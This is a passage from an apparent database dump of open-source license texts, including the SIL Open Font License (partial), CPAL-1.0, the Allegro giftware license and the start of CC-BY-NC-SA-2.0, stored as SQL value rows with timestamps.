environment.\n\n\"Author\" refers to any designer, engineer, programmer, technical writer or\nother person who contributed to the Font Software.\n\nPERMISSION & CONDITIONS\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof the Font Software, to use, study, copy, merge, embed, modify, redistribute,\nand sell modified and unmodified copies of the Font Software, subject to the\nfollowing conditions:\n\n1) Neither the Font Software nor any of its individual components, in Original\nor Modified Versions, may be sold by itself.\n\n2) Original or Modified Versions of the Font Software may be bundled, redistributed\nand/or sold with any software, provided that each copy contains the above\ncopyright notice and this license. These can be included either as stand-alone\ntext files, human-readable headers or in the appropriate machine-readable\nmetadata fields within text or binary files as long as those fields can be\neasily viewed by the user.\n\n3) No Modified Version of the Font Software may use the Reserved Font Name(s)\nunless explicit written permission is granted by the corresponding Copyright\nHolder. This restriction only applies to the primary font name as presented\nto the users.\n\n4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font Software\nshall not be used to promote, endorse or advertise any Modified Version, except\nto acknowledge the contribution(s) of the Copyright Holder(s) and the Author(s)\nor with their explicit written permission.\n\n5) The Font Software, modified or unmodified, in part or in whole, must be\ndistributed entirely under this license, and must not be distributed under\nany other license. The requirement for fonts to remain under this license\ndoes not apply to any document created using the Font Software.\n\nTERMINATION\n\nThis license becomes null and void if any of the above conditions are not met.\n\nDISCLAIMER\n\nTHE FONT SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS\nOR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT OF COPYRIGHT, PATENT,\nTRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE COPYRIGHT HOLDER BE LIABLE\nFOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, INCLUDING ANY GENERAL, SPECIAL,\nINDIRECT, INCIDENTAL, OR CONSEQUENTIAL DAMAGES, WHETHER IN AN ACTION OF CONTRACT,\nTORT OR OTHERWISE, ARISING FROM, OUT OF THE USE OR INABILITY TO USE THE FONT\nSOFTWARE OR FROM OTHER DEALINGS IN THE FONT SOFTWARE.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(163,'CPAL-1.0','Common Public Attribution License Version 1.0 (CPAL)\n\n 1. \"Definitions\"\n\n1.0.1 \"Commercial Use\" means distribution or otherwise making the Covered\nCode available to a third party.\n\n1.1 \"Contributor\" means each entity that creates or contributes to the creation\nof Modifications.\n\n1.2 \"Contributor Version\" means the combination of the Original Code, prior\nModifications used by a Contributor, and the Modifications made by that particular\nContributor.\n\n1.3 \"Covered Code\" means the Original Code or Modifications or the combination\nof the Original Code and Modifications, in each case including portions thereof.\n\n1.4 \"Electronic Distribution Mechanism\" means a mechanism generally accepted\nin the software development community for the electronic transfer of data.\n\n 1.5 \"Executable\" means Covered Code in any form other than Source Code.\n\n1.6 \"Initial Developer\" means the individual or entity identified as the Initial\nDeveloper in the Source Code notice required by Exhibit A.\n\n1.7 \"Larger Work\" means a work which combines Covered Code or portions thereof\nwith code not governed by the terms of this License.\n\n 1.8 \"License\" means this document.\n\n1.8.1 \"Licensable\" means having the right to grant, to the maximum extent\npossible, whether at the time of the initial grant or subsequently acquired,\nany and all of the rights conveyed herein.\n\n1.9 \"Modifications\" means any addition to or deletion from the substance or\nstructure of either the Original Code or any previous Modifications. When\nCovered Code is released as a series of files, a Modification is:\n\nA. Any addition to or deletion from the contents of a file containing Original\nCode or previous Modifications.\n\nB. Any new file that contains any part of the Original Code or previous Modifications.\n\n1.10 \"Original Code\" means Source Code of computer software code which is\ndescribed in the Source Code notice required by Exhibit A as Original Code,\nand which, at the time of its release under this License is not already Covered\nCode governed by this License.\n\n1.10.1 \"Patent Claims\" means any patent claim(s), now owned or hereafter acquired,\nincluding without limitation, method, process, and apparatus claims, in any\npatent Licensable by grantor.\n\n1.11 \"Source Code\" means the preferred form of the Covered Code for making\nmodifications to it, including all modules it contains, plus any associated\ninterface definition files, scripts used to control compilation and installation\nof an Executable, or source code differential comparisons against either the\nOriginal Code or another well known, available Covered Code of the Contributor\'s\nchoice. The Source Code can be in a compressed or archival form, provided\nthe appropriate decompression or de-archiving software is widely available\nfor no charge.\n\n1.12 \"You\" (or \"Your\") means an individual or a legal entity exercising rights\nunder, and complying with all of the terms of, this License or a future version\nof this License issued under Section 6.1. For legal entities, \"You\" includes\nany entity which controls, is controlled by, or is under common control with\nYou. For purposes of this definition, \"control\" means (a) the power, direct\nor indirect, to cause the direction or management of such entity, whether\nby contract or otherwise, or (b) ownership of more than fifty percent (50%)\nof the outstanding shares or beneficial ownership of such entity.\n\n 2. Source Code License.\n\n 2.1 The Initial Developer Grant.\n\nThe Initial Developer hereby grants You a world-wide, royalty-free, non-exclusive\nlicense, subject to third party intellectual property claims:\n\n(a) under intellectual property rights (other than patent or trademark) Licensable\nby Initial Developer to use, reproduce, modify, display, perform, sublicense\nand distribute the Original Code (or portions thereof) with or without Modifications,\nand/or as part of a Larger Work; and\n\n(b) under Patents Claims infringed by the making, using or selling of Original\nCode, to make, have made, use, practice, sell, and offer for sale, and/or\notherwise dispose of the Original Code (or portions thereof).\n\n(c) the licenses granted in this Section 2.1(a) and (b) are effective on the\ndate Initial Developer first distributes Original Code under the terms of\nthis License.\n\n(d) Notwithstanding Section 2.1(b) above, no patent license is granted: 1)\nfor code that You delete from the Original Code; 2) separate from the Original\nCode; or 3) for infringements caused by: i) the modification of the Original\nCode or ii) the combination of the Original Code with other software or devices.\n\n 2.2 Contributor Grant.\n\nSubject to third party intellectual property claims, each Contributor hereby\ngrants You a world-wide, royalty-free, non-exclusive license\n\n(a) under intellectual property rights (other than patent or trademark) Licensable\nby Contributor, to use, reproduce, modify, display, perform, sublicense and\ndistribute the Modifications created by such Contributor (or portions thereof)\neither on an unmodified basis, with other Modifications, as Covered Code and/or\nas part of a Larger Work; and\n\n(b) under Patent Claims infringed by the making, using, or selling of Modifications\nmade by that Contributor either alone and/or in combination with its Contributor\nVersion (or portions of such combination), to make, use, sell, offer for sale,\nhave made, and/or otherwise dispose of: 1) Modifications made by that Contributor\n(or portions thereof); and 2) the combination of Modifications made by that\nContributor with its Contributor Version (or portions of such combination).\n\n(c) the licenses granted in Sections 2.2(a) and 2.2(b) are effective on the\ndate Contributor first makes Commercial Use of the Covered Code.\n\n(d) Notwithstanding Section 2.2(b) above, no patent license is granted: 1)\nfor any code that Contributor has deleted from the Contributor Version; 2)\nseparate from the Contributor Version; 3) for infringements caused by: i)\nthird party modifications of Contributor Version or ii) the combination of\nModifications made by that Contributor with other software (except as part\nof the Contributor Version) or other devices; or 4) under Patent Claims infringed\nby Covered Code in the absence of Modifications made by that Contributor.\n\n 3. Distribution Obligations.\n\n 3.1 Application of License.\n\nThe Modifications which You create or to which You contribute are governed\nby the terms of this License, including without limitation Section 2.2. The\nSource Code version of Covered Code may be distributed only under the terms\nof this License or a future version of this License released under Section\n6.1, and You must include a copy of this License with every copy of the Source\nCode You distribute. You may not offer or impose any terms on any Source Code\nversion that alters or restricts the applicable version of this License or\nthe recipients\' rights hereunder. However, You may include an additional document\noffering the additional rights described in Section 3.5.\n\n 3.2 Availability of Source Code.\n\nAny Modification which You create or to which You contribute must be made\navailable in Source Code form under the terms of this License either on the\nsame media as an Executable version or via an accepted Electronic Distribution\nMechanism to anyone to whom you made an Executable version available; and\nif made available via Electronic Distribution Mechanism, must remain available\nfor at least twelve (12) months after the date it initially became available,\nor at least six (6) months after a subsequent version of that particular Modification\nhas been made available to such recipients. You are responsible for ensuring\nthat the Source Code version remains available even if the Electronic Distribution\nMechanism is maintained by a third party.\n\n 3.3 Description of Modifications.\n\nYou must cause all Covered Code to which You contribute to contain a file\ndocumenting the changes You made to create that Covered Code and the date\nof any change. You must include a prominent statement that the Modification\nis derived, directly or indirectly, from Original Code provided by the Initial\nDeveloper and including the name of the Initial Developer in (a) the Source\nCode, and (b) in any notice in an Executable version or related documentation\nin which You describe the origin or ownership of the Covered Code.\n\n 3.4 Intellectual Property Matters\n\n(a) Third Party Claims. If Contributor has knowledge that a license under\na third party\'s intellectual property rights is required to exercise the rights\ngranted by such Contributor under Sections 2.1 or 2.2, Contributor must include\na text file with the Source Code distribution titled \"LEGAL\" which describes\nthe claim and the party making the claim in sufficient detail that a recipient\nwill know whom to contact. If Contributor obtains such knowledge after the\nModification is made available as described in Section 3.2, Contributor shall\npromptly modify the LEGAL file in all copies Contributor makes available thereafter\nand shall take other steps (such as notifying appropriate mailing lists or\nnewsgroups) reasonably calculated to inform those who received the Covered\nCode that new knowledge has been obtained.\n\n(b) Contributor APIs. If Contributor\'s Modifications include an application\nprogramming interface and Contributor has knowledge of patent licenses which\nare reasonably necessary to implement that API, Contributor must also include\nthis information in the LEGAL file.\n\n(c) Representations. Contributor represents that, except as disclosed pursuant\nto Section 3.4(a) above, Contributor believes that Contributor\'s Modifications\nare Contributor\'s original creation(s) and/or Contributor has sufficient rights\nto grant the rights conveyed by this License.\n\n 3.5 Required Notices.\n\nYou must duplicate the notice in Exhibit A in each file of the Source Code.\nIf it is not possible to put such notice in a particular Source Code file\ndue to its structure, then You must include such notice in a location (such\nas a relevant directory) where a user would be likely to look for such a notice.\nIf You created one or more Modification(s) You may add your name as a Contributor\nto the notice described in Exhibit A. You must also duplicate this License\nin any documentation for the Source Code where You describe recipients\' rights\nor ownership rights relating to Covered Code. You may choose to offer, and\nto charge a fee for, warranty, support, indemnity or liability obligations\nto one or more recipients of Covered Code. However, You may do so only on\nYour own behalf, and not on behalf of the Initial Developer or any Contributor.\nYou must make it absolutely clear than any such warranty, support, indemnity\nor liability obligation is offered by You alone, and You hereby agree to indemnify\nthe Initial Developer and every Contributor for any liability incurred by\nthe Initial Developer or such Contributor as a result of warranty, support,\nindemnity or liability terms You offer.\n\n 3.6 Distribution of Executable Versions.\n\nYou may distribute Covered Code in Executable form only if the requirements\nof Section 3.1-3.5 have been met for that Covered Code, and if You include\na notice stating that the Source Code version of the Covered Code is available\nunder the terms of this License, including a description of how and where\nYou have fulfilled the obligations of Section 3.2. The notice must be conspicuously\nincluded in any notice in an Executable version, related documentation or\ncollateral in which You describe recipients\' rights relating to the Covered\nCode. You may distribute the Executable version of Covered Code or ownership\nrights under a license of Your choice, which may contain terms different from\nthis License, provided that You are in compliance with the terms of this License\nand that the license for the Executable version does not attempt to limit\nor alter the recipient\'s rights in the Source Code version from the rights\nset forth in this License. If You distribute the Executable version under\na different license You must make it absolutely clear that any terms which\ndiffer from this License are offered by You alone, not by the Initial Developer,\nOriginal Developer or any Contributor. You hereby agree to indemnify the Initial\nDeveloper, Original Developer and every Contributor for any liability incurred\nby the Initial Developer, Original Developer or such Contributor as a result\nof any such terms You offer.\n\n 3.7 Larger Works.\n\nYou may create a Larger Work by combining Covered Code with other code not\ngoverned by the terms of this License and distribute the Larger Work as a\nsingle product. In such a case, You must make sure the requirements of this\nLicense are fulfilled for the Covered Code.\n\n 4. Inability to Comply Due to Statute or Regulation.\n\nIf it is impossible for You to comply with any of the terms of this License\nwith respect to some or all of the Covered Code due to statute, judicial order,\nor regulation then You must: (a) comply with the terms of this License to\nthe maximum extent possible; and (b) describe the limitations and the code\nthey affect. Such description must be included in the LEGAL file described\nin Section 3.4 and must be included with all distributions of the Source Code.\nExcept to the extent prohibited by statute or regulation, such description\nmust be sufficiently detailed for a recipient of ordinary skill to be able\nto understand it.\n\n 5. Application of this License.\n\nThis License applies to code to which the Initial Developer has attached the\nnotice in Exhibit A and to related Covered Code.\n\n 6. Versions of the License.\n\n 6.1 New Versions.\n\nSocialtext, Inc. (\"Socialtext\") may publish revised and/or new versions of\nthe License from time to time. Each version will be given a distinguishing\nversion number.\n\n 6.2 Effect of New Versions.\n\nOnce Covered Code has been published under a particular version of the License,\nYou may always continue to use it under the terms of that version. You may\nalso choose to use such Covered Code under the terms of any subsequent version\nof the License published by Socialtext. No one other than Socialtext has the\nright to modify the terms applicable to Covered Code created under this License.\n\n 6.3 Derivative Works.\n\nIf You create or use a modified version of this License (which you may only\ndo in order to apply it to code which is not already Covered Code governed\nby this License), You must (a) rename Your license so that the phrases \"Socialtext\",\n\"CPAL\" or any confusingly similar phrase do not appear in your license (except\nto note that your license differs from this License) and (b) otherwise make\nit clear that Your version of the license contains terms which differ from\nthe CPAL. (Filling in the name of the Initial Developer, Original Developer,\nOriginal Code or Contributor in the notice described in Exhibit A shall not\nof themselves be deemed to be modifications of this License.)\n\n 7. DISCLAIMER OF WARRANTY.\n\nCOVERED CODE IS PROVIDED UNDER THIS LICENSE ON AN \"AS IS\" BASIS, WITHOUT WARRANTY\nOF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, WITHOUT LIMITATION, WARRANTIES\nTHAT THE COVERED CODE IS FREE OF DEFECTS, MERCHANTABLE, FIT FOR A PARTICULAR\nPURPOSE OR NON-INFRINGING. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE\nOF THE COVERED CODE IS WITH YOU. SHOULD ANY COVERED CODE PROVE DEFECTIVE IN\nANY RESPECT, YOU (NOT THE INITIAL DEVELOPER, ORIGINAL DEVELOPER OR ANY OTHER\nCONTRIBUTOR) ASSUME THE COST OF ANY NECESSARY SERVICING, REPAIR OR CORRECTION.\nTHIS DISCLAIMER OF WARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS LICENSE.\nNO USE OF ANY COVERED CODE IS AUTHORIZED HEREUNDER EXCEPT UNDER THIS DISCLAIMER.\n\n 8. TERMINATION.\n\n8.1 This License and the rights granted hereunder will terminate automatically\nif You fail to comply with terms herein and fail to cure such breach within\n30 days of becoming aware of the breach. All sublicenses to the Covered Code\nwhich are properly granted shall survive any termination of this License.\nProvisions which, by their nature, must remain in effect beyond the termination\nof this License shall survive.\n\n8.2 If You initiate litigation by asserting a patent infringement claim (excluding\ndeclatory judgment actions) against Initial Developer, Original Developer\nor a Contributor (the Initial Developer, Original Developer or Contributor\nagainst whom You file such action is referred to as \"Participant\") alleging\nthat:\n\n(a) such Participant\'s Contributor Version directly or indirectly infringes\nany patent, then any and all rights granted by such Participant to You under\nSections 2.1 and/or 2.2 of this License shall, upon 60 days notice from Participant\nterminate prospectively, unless if within 60 days after receipt of notice\nYou either: (i) agree in writing to pay Participant a mutually agreeable reasonable\nroyalty for Your past and future use of Modifications made by such Participant,\nor (ii) withdraw Your litigation claim with respect to the Contributor Version\nagainst such Participant. If within 60 days of notice, a reasonable royalty\nand payment arrangement are not mutually agreed upon in writing by the parties\nor the litigation claim is not withdrawn, the rights granted by Participant\nto You under Sections 2.1 and/or 2.2 automatically terminate at the expiration\nof the 60 day notice period specified above.\n\n(b) any software, hardware, or device, other than such Participant\'s Contributor\nVersion, directly or indirectly infringes any patent, then any rights granted\nto You by such Participant under Sections 2.1(b) and 2.2(b) are revoked effective\nas of the date You first made, used, sold, distributed, or had made, Modifications\nmade by that Participant.\n\n8.3 If You assert a patent infringement claim against Participant alleging\nthat such Participant\'s Contributor Version directly or indirectly infringes\nany patent where such claim is resolved (such as by license or settlement)\nprior to the initiation of patent infringement litigation, then the reasonable\nvalue of the licenses granted by such Participant under Sections 2.1 or 2.2\nshall be taken into account in determining the amount or value of any payment\nor license.\n\n8.4 In the event of termination under Sections 8.1 or 8.2 above, all end user\nlicense agreements (excluding distributors and resellers) which have been\nvalidly granted by You or any distributor hereunder prior to termination shall\nsurvive termination.\n\n 9. LIMITATION OF LIABILITY.\n\nUNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY, WHETHER TORT (INCLUDING\nNEGLIGENCE), CONTRACT, OR OTHERWISE, SHALL YOU, THE INITIAL DEVELOPER, ORIGINAL\nDEVELOPER, ANY OTHER CONTRIBUTOR, OR ANY DISTRIBUTOR OF COVERED CODE, OR ANY\nSUPPLIER OF ANY OF SUCH PARTIES, BE LIABLE TO ANY PERSON FOR ANY INDIRECT,\nSPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES OF ANY CHARACTER INCLUDING,\nWITHOUT LIMITATION, DAMAGES FOR LOSS OF GOODWILL, WORK STOPPAGE, COMPUTER\nFAILURE OR MALFUNCTION, OR ANY AND ALL OTHER COMMERCIAL DAMAGES OR LOSSES,\nEVEN IF SUCH PARTY SHALL HAVE BEEN INFORMED OF THE POSSIBILITY OF SUCH DAMAGES.\nTHIS LIMITATION OF LIABILITY SHALL NOT APPLY TO LIABILITY FOR DEATH OR PERSONAL\nINJURY RESULTING FROM SUCH PARTY\'S NEGLIGENCE TO THE EXTENT APPLICABLE LAW\nPROHIBITS SUCH LIMITATION. SOME JURISDICTIONS DO NOT ALLOW THE EXCLUSION OR\nLIMITATION OF INCIDENTAL OR CONSEQUENTIAL DAMAGES, SO THIS EXCLUSION AND LIMITATION\nMAY NOT APPLY TO YOU.\n\n 10. U.S. GOVERNMENT END USERS.\n\nThe Covered Code is a \"commercial item,\" as that term is defined in 48 C.F.R.\n2.101 (Oct. 1995), consisting of \"commercial computer software\" and \"commercial\ncomputer software documentation,\" as such terms are used in 48 C.F.R. 12.212\n(Sept. 1995). Consistent with 48 C.F.R. 12.212 and 48 C.F.R. 227.7202-1 through\n227.7202-4 (June 1995), all U.S. Government End Users acquire Covered Code\nwith only those rights set forth herein.\n\n 11. MISCELLANEOUS.\n\nThis License represents the complete agreement concerning subject matter hereof.\nIf any provision of this License is held to be unenforceable, such provision\nshall be reformed only to the extent necessary to make it enforceable. This\nLicense shall be governed by California law provisions (except to the extent\napplicable law, if any, provides otherwise), excluding its conflict-of-law\nprovisions. With respect to disputes in which at least one party is a citizen\nof, or an entity chartered or registered to do business in the United States\nof America, any litigation relating to this License shall be subject to the\njurisdiction of the Federal Courts of the Northern District of California,\nwith venue lying in Santa Clara County, California, with the losing party\nresponsible for costs, including without limitation, court costs and reasonable\nattorneys\' fees and expenses. The application of the United Nations Convention\non Contracts for the International Sale of Goods is expressly excluded. Any\nlaw or regulation which provides that the language of a contract shall be\nconstrued against the drafter shall not apply to this License.\n\n 12. RESPONSIBILITY FOR CLAIMS.\n\nAs between Initial Developer, Original Developer and the Contributors, each\nparty is responsible for claims and damages arising, directly or indirectly,\nout of its utilization of rights under this License and You agree to work\nwith Initial Developer, Original Developer and Contributors to distribute\nsuch responsibility on an equitable basis. Nothing herein is intended or shall\nbe deemed to constitute any admission of liability.\n\n 13. MULTIPLE-LICENSED CODE.\n\nInitial Developer may designate portions of the Covered Code as Multiple-Licensed.\nMultiple-Licensed means that the Initial Developer permits you to utilize\nportions of the Covered Code under Your choice of the CPAL or the alternative\nlicenses, if any, specified by the Initial Developer in the file described\nin Exhibit A.\n\n 14. ADDITIONAL TERM: ATTRIBUTION\n\n(a) As a modest attribution to the organizer of the development of the Original\nCode (\"Original Developer\"), in the hope that its promotional value may help\njustify the time, money and effort invested in writing the Original Code,\nthe Original Developer may include in Exhibit B (\"Attribution Information\")\na requirement that each time an Executable and Source Code or a Larger Work\nis launched or initially run (which includes initiating a session), a prominent\ndisplay of the Original Developer\'s Attribution Information (as defined below)\nmust occur on the graphic user interface employed by the end user to access\nsuch Covered Code (which may include display on a splash screen), if any.\nThe size of the graphic image should be consistent with the size of the other\nelements of the Attribution Information. If the access by the end user to\nthe Executable and Source Code does not create a graphic user interface for\naccess to the Covered Code, this obligation shall not apply. If the Original\nCode displays such Attribution Information in a particular form (such as in\nthe form of a splash screen, notice at login, an \"about\" display, or dedicated\nattribution area on user interface screens), continued use of such form for\nthat Attribution Information is one way of meeting this requirement for notice.\n\n(b) Attribution information may only include a copyright notice, a brief phrase,\ngraphic image and a URL (\"Attribution Information\") and is subject to the\nAttribution Limits as defined below. For these purposes, prominent shall mean\ndisplay for sufficient duration to give reasonable notice to the user of the\nidentity of the Original Developer and that if You include Attribution Information\nor similar information for other parties, You must ensure that the Attribution\nInformation for the Original Developer shall be no less prominent than such\nAttribution Information or similar information for the other party. For greater\ncertainty, the Original Developer may choose to specify in Exhibit B below\nthat the above attribution requirement only applies to an Executable and Source\nCode resulting from the Original Code or any Modification, but not a Larger\nWork. The intent is to provide for reasonably modest attribution, therefore\nthe Original Developer cannot require that You display, at any time, more\nthan the following information as Attribution Information: (a) a copyright\nnotice including the name of the Original Developer; (b) a word or one phrase\n(not exceeding 10 words); (c) one graphic image provided by the Original Developer;\nand (d) a URL (collectively, the \"Attribution Limits\").\n\n(c) If Exhibit B does not include any Attribution Information, then there\nare no requirements for You to display any Attribution Information of the\nOriginal Developer.\n\n(d) You acknowledge that all trademarks, service marks and/or trade names\ncontained within the Attribution Information distributed with the Covered\nCode are the exclusive property of their owners and may only be used with\nthe permission of their owners, or under circumstances otherwise permitted\nby law or as expressly set out in this License.\n\n 15. ADDITIONAL TERM: NETWORK USE.\n\nThe term \"External Deployment\" means the use, distribution, or communication\nof the Original Code or Modifications in any way such that the Original Code\nor Modifications may be used by anyone other than You, whether those works\nare distributed or communicated to those persons or made available as an application\nintended for use over a network. As an express condition for the grants of\nlicense hereunder, You must treat any External Deployment by You of the Original\nCode or Modifications as a distribution under section 3.1 and make Source\nCode available under Section 3.2. EXHIBIT A. Common Public Attribution License\nVersion 1.0.\n\n\"The contents of this file are subject to the Common Public Attribution License\nVersion 1.0 (the \"License\"); you may not use this file except in compliance\nwith the License. You may obtain a copy of the License at _____________ .\nThe License is based on the Mozilla Public License Version 1.1 but Sections\n14 and 15 have been added to cover use of software over a computer network\nand provide for limited attribution for the Original Developer. In addition,\nExhibit A has been modified to be consistent with Exhibit B.\n\nSoftware distributed under the License is distributed on an \"AS IS\" basis,\nWITHOUT WARRANTY OF ANY KIND, either express or implied. See the License for\nthe specific language governing rights and limitations under the License.\n\nThe Original Code is ______________________ .\n\nThe Original Developer is not the Initial Developer and is __________ . If\nleft blank, the Original Developer is the Initial Developer.\n\nThe Initial Developer of the Original Code is ____________ . All portions\nof the code written by ___________ are Copyright (c) _____ . All Rights Reserved.\n\nContributor ______________________ .\n\nAlternatively, the contents of this file may be used under the terms of the\n_____ license (the [___] License), in which case the provisions of [______]\nLicense are applicable instead of those above.\n\nIf you wish to allow use of your version of this file only under the terms\nof the [____] License and not to allow others to use your version of this\nfile under the CPAL, indicate your decision by deleting the provisions above\nand replace them with the notice and other provisions required by the [___]\nLicense. If you do not delete the provisions above, a recipient may use your\nversion of this file under either the CPAL or the [___] License.\"\n\n[NOTE: The text of this Exhibit A may differ slightly from the text of the\nnotices in the Source Code files of the Original Code. You should use the\ntext of this Exhibit A rather than the text found in the Original Code Source\nCode for Your Modifications.]\n\nEXHIBIT B. Attribution Information\n\nAttribution Copyright Notice: _______________________\n\nAttribution Phrase (not exceeding 10 words): _______________________\n\nAttribution URL: _______________________\n\nGraphic Image as provided in the Covered Code, if any.\n\nDisplay of Attribution Information is [required/not required] in Larger Works\nwhich are defined in the CPAL as a work which combines Covered Code or portions\nthereof with code not governed by the terms of the CPAL.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(164,'Giftware','Allegro 4 (the giftware license)\n\nAllegro is gift-ware. It was created by a number of people working in cooperation,\nand is given to you freely as a gift. You may use, modify, redistribute, and\ngenerally hack it about in any way you like, and you do not have to give us\nanything in return.\n\nHowever, if you like this product you are encouraged to thank us by making\na return gift to the Allegro community. This could be by writing an add-on\npackage, providing a useful bug report, making an improvement to the library,\nor perhaps just releasing the sources of your program so that other people\ncan learn from them. If you redistribute parts of this code or make a game\nusing it, it would be nice if you mentioned Allegro somewhere in the credits,\nbut you are not required to do this. We trust you not to abuse our generosity.\n\nBy Shawn Hargreaves, 18 October 1998.\n\nDISCLAIMER: THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\nEXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE, TITLE AND NON-INFRINGEMENT. IN NO EVENT\nSHALL THE COPYRIGHT HOLDERS OR ANYONE DISTRIBUTING THE SOFTWARE BE LIABLE\nFOR ANY DAMAGES OR OTHER LIABILITY, WHETHER IN CONTRACT, TORT OR OTHERWISE,\nARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER\nDEALINGS IN THE SOFTWARE.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(165,'CC-BY-NC-SA-2.0','Creative Commons Attribution-NonCommercial-ShareAlike 2.0 CREATIVE COMMONS\nCORPORATION IS NOT A LAW FIRM AND DOES NOT PROVIDE LEGAL SERVICES. DISTRIBUTION\nOF THIS LICENSE DOES NOT CREATE AN ATTORNEY-CLIENT RELATIONSHIP. CREATIVE\nCOMMONS PROVIDES THIS INFORMATION ON AN \"AS-IS\" BASIS. CREATIVE COMMONS MAKES\nNO WARRANTIES REGARDING THE INFORMATION PROVIDED, AND DISCLAIMS LIABILITY\nFOR DAMAGES RESULTING FROM ITS USE.\n\nLicense\n\nTHE WORK (AS DEFINED BELOW) IS PROVIDED UNDER THE TERMS OF THIS CREATIVE COMMONS\nPUBLIC LICENSE (\"CCPL\" OR \"LICENSE\"). THE WORK IS PROTECTED BY COPYRIGHT AND/OR\nOTHER APPLICABLE LAW. ANY USE OF THE WORK OTHER THAN AS AUTHORIZED UNDER THIS\nLICENSE OR COPYRIGHT LAW IS PROHIBITED.\n\nBY EXERCISING ANY RIGHTS TO THE WORK PROVIDED HERE, YOU ACCEPT AND AGREE TO\nBE BOUND BY THE TERMS OF THIS LICENSE. THE LICENSOR GRANTS YOU THE RIGHTS\nCONTAINED HERE IN CONSIDERATION OF YOUR ACCEPTANCE OF SUCH TERMS AND CONDITIONS.\n\n 1. Definitions\n\na. \"Collective Work\" means a work, such as a periodical issue, anthology or\nencyclopedia, in which the Work in its entirety in unmodified form, along\nwith a number of other contributions, constituting separate and independent\nworks in themselves, are assembled into a collective whole. A work that constitutes\na Collective Work will not be considered a Derivative Work (as defined below)\nfor the purposes of this License.\n\nb. \"Derivative Work\" means a work based upon the Work or upon the Work and\nother pre-existing works, such as a translation, musical arrangement, dramatization,\nfictionalization, motion picture version, sound recording, art reproduction,\nabridgment, condensation, or any other form in which the Work may be recast,\ntransformed, or adapted, except that a work that constitutes a Collective\nWork will not be considered a Derivative Work for the purpose of this License.\nFor the avoidance of doubt, where the Work is a musical composition or sound\nrecording, the synchronization of the Work in timed-relation with a moving\nimage (\"synching\") will be considered a Derivative Work for the purpose of\nthis License.\n\nc. \"Licensor\" means the individual or entity that offers the Work under the\nterms of this License.\n\n d. \"Original Author\" means the individual or entity who created the Work.\n\ne. \"Work\" means the copyrightable work of authorship offered under the terms\nof this License.\n\nf. \"You\" means an individual or entity exercising rights under this License\nwho has not previously violated the terms of this License with respect to\nthe Work, or who has received express permission from the Licensor to exercise\nrights under this License despite a previous violation.\n\ng. \"License Elements\" means the following high-level license attributes as\nselected by Licensor and indicated in the title of this License: Attribution,\nNoncommercial, ShareAlike.\n\n2. Fair Use Rights. Nothing in this license is intended to reduce, limit,\nor restrict any rights arising from fair use, first sale or other limitations\non the exclusive rights of the copyright owner under copyright law or other\napplicable laws.\n\n3. License Grant. Subject to the terms and conditions of this License, Licensor\nhereby grants You a worldwide, royalty-free, non-exclusive, perpetual (for\nthe duration of the applicable copyright) license to exercise the rights in\nthe Work as stated below:\n\na. to reproduce the Work, to incorporate the Work into one or more Collective\nWorks, and to reproduce the Work as incorporated in the Collective Works;\n\n b. to create and reproduce Derivative Works;\n\nc. to distribute copies or phonorecords of, display publicly, perform publicly,\nand perform publicly by means of a digital audio transmission the Work including\nas incorporated in Collective Works;\n\nd. to distribute copies or phonorecords of, display publicly, perform publicly,\nand perform publicly by means of a digital audio transmission Derivative Works;\n\nThe above rights may be exercised in all media and formats whether now known\nor hereafter devised. The above rights include the right to make such modifications\nas are technically necessary to exercise the rights in other media and formats.\nAll rights not expressly granted by Licensor are hereby reserved, including\nbut not limited to the rights set forth in Sections 4(e) and 4(f).\n\n4. Restrictions. The license granted in Section 3 above is expressly made\nsubject to and limited by the following restrictions:\n\na. You may distribute, publicly display, publicly perform, or publicly digitally\nperform the Work only under the terms of this License, and You must include\na copy of, or the Uniform Resource Identifier for, this License with every\ncopy or phonorecord of the Work You distribute, publicly display, publicly\nperform, or publicly digitally perform. You may not offer or impose any terms\non the Work that alter or restrict the terms of this License or the recipients\'\nexercise of the rights granted hereunder. You may not sublicense the Work.\nYou must keep intact all notices that refer to this License and to the disclaimer\nof warranties. You may not distribute, publicly display, publicly perform,\nor publicly digitally perform the Work with any technological measures that\ncontrol access or use of the Work in a manner inconsistent with the terms\nof this License Agreement. The above applies to the Work as incorporated in\na Collective Work, but this does not require the Collective Work apart from\nthe Work itself to be made subject to the terms of this License. If You create\na Collective Work, upon notice from any Licensor You must, to the extent practicable,\nremove from the Collective Work any reference to such Licensor or the Original\nAuthor, as requested. If You create a Derivative Work, upon notice from any\nLicensor You must, to the extent practicable, remove from the Derivative Work\nany reference to such Licensor or the Original Author, as requested.\n\nb. You may distribute, publicly display, publicly perform, or publicly digitally\nperform a Derivative Work only under the terms of this License, a later version\nof this License with the same License Elements as this License, or a Creative\nCommons iCommons license that contains the same License Elements as this License\n(e.g. Attribution-NonCommercial-ShareAlike 2.0 Japan). You must include a\ncopy of, or the Uniform Resource Identifier for, this License or other license\nspecified in the previous sentence with every copy or phonorecord of each\nDerivative Work You distribute, publicly display, publicly perform, or publicly\ndigitally perform. You may not offer or impose any terms on the Derivative\nWorks that alter or restrict the terms of this License or the recipients\'\nexercise of the rights granted hereunder, and You must keep intact all notices\nthat refer to this License and to the disclaimer of warranties. You may not\ndistribute, publicly display, publicly perform, or publicly digitally perform\nthe Derivative Work with any technological measures that control access or\nuse of the Work in a manner inconsistent with the terms of this License 